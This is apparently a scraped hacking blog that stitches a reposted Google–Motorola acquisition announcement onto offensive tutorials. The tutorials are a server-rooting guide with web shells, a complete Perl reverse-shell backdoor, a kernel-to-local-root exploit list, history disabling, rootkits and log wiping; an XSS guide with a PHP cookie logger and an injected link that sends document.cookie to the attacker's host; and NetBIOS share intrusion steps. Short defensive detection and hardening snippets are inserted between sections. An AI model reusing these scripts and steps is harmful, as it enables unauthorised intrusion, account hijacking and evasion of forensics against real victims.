Interesting news came out a few days ago: Google is to acquire Motorola Mobility, following the growth over the past years from 90 million to 150 million Android devices.

8/15/2011 04:35:00 AM

Since its launch in November 2007, Android has not only dramatically increased consumer choice but also improved the entire mobile experience for users. Today, more than 150 million Android devices have been activated worldwide—with over 550,000 devices now lit up every day—through a network of about 39 manufacturers and 231 carriers in 123 countries. Given Android’s phenomenal success, we are always looking for new ways to supercharge the Android ecosystem. That is why I am so excited today to announce that we have agreed to acquire Motorola.

Motorola has a history of over 80 years of innovation in communications technology and products, and in the development of intellectual property, which have helped drive the remarkable revolution in mobile computing we are all enjoying today. Its many industry milestones include the introduction of the world’s first portable cell phone nearly 30 years ago, and the StarTAC—the smallest and lightest phone on earth at time of launch. In 2007, Motorola was a founding member of the Open Handset Alliance that worked to make Android the first truly open and comprehensive platform for mobile devices. I have loved my Motorola phones from the StarTAC era up to the current DROIDs.

In 2008, Motorola bet big on Android as the sole operating system across all of its smartphone devices. It was a smart bet and we’re thrilled at the success they’ve achieved so far. We believe that their mobile business is on an upward trajectory and poised for explosive growth.

Motorola is also a market leader in the home devices and video solutions business. With the transition to Internet Protocol, we are excited to work together with Motorola and the industry to support our partners and cooperate with them to accelerate innovation in this space.

Motorola’s total commitment to Android in mobile devices is one of many reasons that there is a natural fit between our two companies. Together, we will create amazing user experiences that supercharge the entire Android ecosystem for the benefit of consumers, partners and developers everywhere.

This acquisition will not change our commitment to run Android as an open platform. Motorola will remain a licensee of Android and Android will remain open. We will run Motorola as a separate business. Many hardware partners have contributed to Android’s success and we look forward to continuing to work with all of them to deliver outstanding user experiences.

We recently explained how companies including Microsoft and Apple are banding together in anti-competitive patent attacks on Android. The U.S. Department of Justice had to intervene in the results of one recent patent auction to “protect competition and innovation in the open source software community” and it is currently looking into the results of the Nortel auction. Our acquisition of Motorola will increase competition by strengthening Google’s patent portfolio, which will enable us to better protect Android from anti-competitive threats from Microsoft, Apple and other companies.

The combination of Google and Motorola will not only supercharge Android, but will also enhance competition and offer consumers accelerating innovation, greater choice, and wonderful user experiences. I am confident that these great experiences will create huge value for shareholders.

I look forward to welcoming Motorolans to our family of Googlers.

Today, I have decided to put up a tutorial for both newbies and pawners, and as a reference for all of us. This is a dream of every hacker, to get free root access. If you haven't got one, then try harder, because you are not a hacker then.

Hacking is not about dumping a database using material pre-scripted by another hacker; a good hacker writes his own script and uses it to the maximum extent to achieve whatever his/her project is, and this is referred to as a private script.

You have to get access to restricted access before you can say, I'm a h4xor or so!
Today, I will give you brief tutorial on how to get your first root access!
Ok enough.

Requirement :
  • Shell
  1. http://unsecure-site.com/r57.php
  2. http://unsecured-site.com/c99.php
This means you have downloaded a shell on the site.

You will need, swiss-army weapon (Don't travel to swiss yet, this is netcat) and it can be downloaded on internet free of charge

You will also need a backconnect script. I provided one for your use here!
So let's roll on.

Shell Access on a website is the first thing you will need.

You can get this access by uploading a shell to a vulnerable website using one of the following methods:
LFI = Local File Inclusion
RFI = Remote File Inclusion
SQL Injection

I will not go to details on the above. I will post extensive tutorial on those later, but I think the forum must have some nice tutorial on those, do some search.
NOW, get swiss knife weapon, AKA netcat
  • http://www.vulnwatch.org/netcat/nc111nt.zip
If you have an antivirus that auto deletes infected files or virus i would suggest disabling it as some av's will detect netcat as a hacktool or remote admin tool.
It is not a virus.

Downloaded? Good on window box, double click it and it will bring up a command prompt, then type
-vv -l -n -p
Now backconnect. I prefer to use one that's not in the shell because I find that those back connects work shitty, so I will provide you with one that I use. Very simple to use: just save as "bc.pl", then upload to server and execute.
Code:
perl bc.pl
Code: PERL

#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# x33x@v!3r Connect Back Shell
# code by : x33x@v!3r
# We Are : x33x@v!3r-h3x4-cr3w\x90
# Email:s4t3ll1t3@ihsteam.com
#
#x33x@v!3r@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by x33x@v!3r ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#x33x@v!3r@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by x33x@v!3r ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown
GNU/Linux
#
#--==Userinfo==--
#uid=1001(lamer) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to
Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to
Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
Copy the above to a file and name it bc.pl upload it to server, you are done.

** Note that if you are running a router or wireless on multiple IPs set by your DHCP, you might have to forward the port to whatever the IP of your computer is. You can check this by opening a command prompt and typing ipconfig; you should get an IP that looks similar to 192.168.1.100, which is the IP to forward to. If you are unsure about how to forward your port, check out this site and find your router model.
  • http://portforward.com/routers.htm
Now back to netcat, type the following command.
-vv -l -n -p 443
For this tutorial, we will connect on port 4343. Hit enter and it should start listening for a connection.

Remember you had downloaded bc.pl on the server; now connect it to your netcat with the following command
perl bc.pl 443
Check your netcat, it should be connected
giving you details info about the box.

I like to do this first to know the kinda exploit u will use.
uname -a;id
Once executed you will see something probably similar to
Code:
Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686
GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The important information here that you want is the OS & Kernel version which is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. Which is a good thing for us.

Below are kernels that can be rooted, just a general idea. I have a link to the kernels and their exploits, check it out.
http://www.molotovbitch.org/localroot/

Code:
2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
You can get the updated version on this site.
  • http://www.molotovbitch.org/localroot/

Once you have found the Kernel ver. of the server you are about to root you need to find
the Local Root Exploit for that kernel which you can find with google using the list
above. or just go here to make it easier!

http://www.molotovbitch.org/localroot/

Now check which exploit goes for which kernel, ok? you found it. good, before doing anything on this server, be as smart as possible, type this command

unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
This simply tries to keep you from being traced through the history of your commands.

Now compile and root.

To compile your scripts, go to the shell that you have spawned with netcat and follow these instructions.

Code:
gcc xpl.c -o xpl
This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing
in your netcat connection

Code:
./xpl

It should execute the exploit file which you have just compiled and give you root

then type
id; whoami

it should say root: you are root

Congratulations! then remember me in your dream for posting this for your use.

Remember, not all exploits are just compile and execute; some require a little work, e.g. h0llyshit. It requires a big file to work.

example of h00lyshit here

before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
then you get h00lyshit.
The command to run this exploit is:
./h00lyshit
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
please wait 2-3 minutes to get the file created!
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can proceed to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
whoami
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner. clean your tracks, never leave them uncleaned!


This tutorial is written by me, siteprojects
for more hands on training you can join me on my irc at irc.unixreal.net #siteprojects

I have provided some server for training.. so dont worry.

written by siteprojects and credit should be given to those who deserve it.

You have permission to post in another forum like always, but do not forget to give credit.
like I say, join irc.unixreal.net #siteprojects on details on how to get box rooted, LFI RFI SQL etc.

N jooooooooooooooy


credits:
- siteprojects
- darkc0de.com
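
For defenders, the steps in this tutorial leave a recognisable trail in process-execution logs: the web server account starting perl, a shell, gcc and dd, and shell history being unset. The following is an added example (not part of the original tutorial) that flags those patterns in constructed sample records; the record format, the account names and the detect function are assumptions for illustration.

```python
import os
import re
import shlex

# Service accounts that run the web server (assumed names; adjust per distro).
WEB_USERS = {"www-data", "apache", "nginx", "nobody"}
# Programs a web worker has no routine reason to start.
SUSPECT_EXES = {"sh", "bash", "perl", "python", "nc", "gcc", "cc", "dd"}
# Shell-history suppression as described in the tutorial.
HISTORY_TAMPER = re.compile(r"unset\s+HIST(FILE|SIZE)\b|HISTFILESIZE=0")
# Hypothetical record format: user=<name> ppid_exe=<parent> cmd="<command line>"
RECORD = re.compile(r'^user=(\S+) ppid_exe=(\S+) cmd="(.*)"$')

# Constructed sample records; 192.0.2.10 is a documentation-only address.
SAMPLE_LOG = """\
user=www-data ppid_exe=apache2 cmd="/usr/sbin/apache2 -k start"
user=www-data ppid_exe=apache2 cmd="perl bc.pl 192.0.2.10 443"
user=www-data ppid_exe=perl cmd="sh -c 'unset HISTFILE; unset SAVEHIST; uname -a; id'"
user=www-data ppid_exe=bash cmd="gcc xpl.c -o xpl"
user=www-data ppid_exe=bash cmd="dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024"
user=alice ppid_exe=bash cmd="gcc hello.c -o hello"
user=root ppid_exe=cron cmd="perl /usr/local/bin/rotate.pl"
"""


def detect(log_text):
    """Return (line_number, rule) findings for each suspicious record."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = RECORD.match(line.strip())
        if not m:
            continue  # skip records that do not parse rather than guessing
        user, _parent, cmd = m.groups()
        try:
            argv = shlex.split(cmd)
        except ValueError:
            argv = cmd.split()  # unbalanced quotes: fall back to whitespace split
        exe = os.path.basename(argv[0]) if argv else ""
        # Rule 1: the web server account launching a shell, interpreter or compiler.
        if user in WEB_USERS and exe in SUSPECT_EXES:
            findings.append((lineno, f"web-account-exec:{exe}"))
        # Rule 2: history suppression, regardless of which account runs it.
        if HISTORY_TAMPER.search(cmd):
            findings.append((lineno, "history-tampering"))
    return findings


if __name__ == "__main__":
    for lineno, rule in detect(SAMPLE_LOG):
        print(f"line {lineno}: {rule}")
```

The same rules translate directly to auditd or EDR process telemetry; the developer account compiling code and the root cron job running perl are deliberately not flagged.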


This is a tutorial video about how to steal cookie using Cross Site Scripting (XSS) trick. Once you got victim's cookie, you can login using his/her account even without knowing his/her password. If you have critiques, suggestions, questions, just drop your comments here :)

Things you will use :
  1. Notepad
  2. Google
  3. Mozilla 3.0 or higher
  4. Mozilla Addons - Firebug 1.4.5
  5. Mozilla Addons - Firecookie 1.0b4 (extension for Firebug)
  6. Web hosting (use free hosting such as www.0fees.net)
  7. Target website

Scenario :
  1. www.abcde.co.id is a website vulnerable to Cross Site Scripting (XSS) attack.
  2. When a member logs in, the system creates a cookie to keep him logged in.
  3. Members can post something, including HTML/JavaScript code, in the textbox, and even users who are not logged in can see that text.
  4. So, an attacker puts a link in the textbox to trap other members.
  5. That link will actually execute a cookie stealing script that the attacker has uploaded to a web hosting account beforehand.
  6. If another member sees and clicks the link, his/her cookie will be logged/recorded in the text file located in the attacker's web hosting.
  7. Then, the attacker opens the text file, get the cookie name and values.
  8. Using Firebug and Firecookie add-ons in Mozilla, the attacker can copy that cookie into browser and login to www.abcde.co.id using target's account, even without knowing his/her target's password.
Now, here's the tutorial :
  • Open notepad and copy paste this code below.
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$date = date ("I ds of F Y h:i:s A");
$user_agent = $_SERVER['HTTP_USER_AGENT']
$file = fopen ('log.txt', 'a');
fwrite($file,"DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n")
fclose($file);

echo '<br>Sorry, this page is under construction</br></br></br>Please click <a href="http://www.anywebsiteyouwanttorefer.com">here</a> to go back to previous page.

?>
  • Then, you save it as "something.php"
  • Create new notepad, leave it empty and save it as "log.txt"
  • Now, you go to your web hosting (if you don't have one, you can register at www.0fees.net for free)
  • Upload the files that you created before "something.php" and "log.txt" into htdocs (other web hosting may different ) ** DONT FORGET TO WRITE DOWN THE URL OF SOMETHING.PHP **
  • Change the permission of files to 777 using chmod.
  • Now, go to www.abcde.co.id (target website) and, using your or your friend's account, inject HTML and JavaScript code into the textbox.
Copy and paste the code below into the textbox :

<a onclick="document.location='http://www.yourweb.0fees.net/something.php?cookie='+escape(document.cookie);" href="#">Click Here For Details.</a>

Wait for a victim: suppose someone logs in to the website.
  • If luck is on the attacker's side, the victim sees the link and clicks it. The victim is taken directly to the page that says "The page is under construction", as written in something.php. The victim then clicks the back link and everything returns to the normal page, so the victim does not suspect anything about the earlier page.
  • Now, the attacker can open the log.txt and get the victim's cookie and values.
  • Once you get the cookie, convert the encoded value to ASCII. (www.centricle.com - ascii convertor)
  • The attacker will find out the victim's username.
  • The attacker will clear all cookies in Mozilla, then open the Firebug add-on to create and edit a cookie.
There's still more, i will update it later... need sleep now..!

What the hell is XSS?! All of you still wondering ?


XSS refers to Cross-site Scripting, a vulnerability in web applications that an attacker can use to steal users' information such as credit card, bank account and PayPal account information and other personal information. All the personal credentials may be stolen through any kind of exploitation. Cookies and phishing or login pages can also be used in exploitation.


Stay tuned.
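
The scenario above depends on two weaknesses in the target site: member-posted HTML is rendered as markup, and the login cookie is readable from page script. The following is an added example (not from the original post) that shows the unsafe rendering beside an encoded one and builds a session cookie with HttpOnly set; the function names, the cookie name and the attacker.example host are assumptions, and the sample input is constructed.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample of member-posted text, modelled on the link in the scenario;
# attacker.example is a placeholder host.
POSTED = ('<a onclick="document.location=\'http://attacker.example/log?cookie=\''
          '+escape(document.cookie);" href="#">Click Here For Details.</a>')


def render_comment_unsafe(text):
    """The flaw in the scenario: member input is placed in the page as markup."""
    return f'<div class="comment">{text}</div>'


def render_comment(text):
    """Hardened: encode for the HTML body so the browser shows text, not markup."""
    return f'<div class="comment">{html.escape(text, quote=True)}</div>'


def session_cookie(session_id):
    """Build a Set-Cookie value that page script cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True   # hidden from document.cookie
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"  # not attached to most cross-site requests
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def response_headers(session_id):
    """Headers for the login response: hardened cookie plus a restrictive CSP.

    Without 'unsafe-inline', the policy also blocks inline handlers such as
    onclick if an encoding step is ever missed.
    """
    return {
        "Set-Cookie": session_cookie(session_id),
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }


if __name__ == "__main__":
    print(render_comment_unsafe(POSTED))
    print(render_comment(POSTED))
    for name, value in response_headers("abc123").items():
        print(f"{name}: {value}")
```

With the encoded rendering the posted link is displayed as literal text, and with HttpOnly set the value of document.cookie no longer contains the session identifier.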


THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO ITS HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.


STEP-BY-STEP NETBIOS HACKING PROCEDURE
  1. Open command prompt
  2. In the command prompt use the “net view” command
  3. ( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSES. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
    Example :
    C:\>net view \\219.64.55.112
    The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a valid IP address in its place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
  4. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
  5. Example-1 :
    C:\>net use D: \\219.64.55.112\F
    Example-2 :
    C:\>net use G: \\219.64.55.112\SharedDocs
    Example-3 :
    C:\>net use I: \\219.64.55.112\Myprint
    NOTE : In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
    NOTE : GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DRIVES, A: AS FLOPPY DRIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
    F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
  6. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE : If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBIOS HACKING!!

© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.
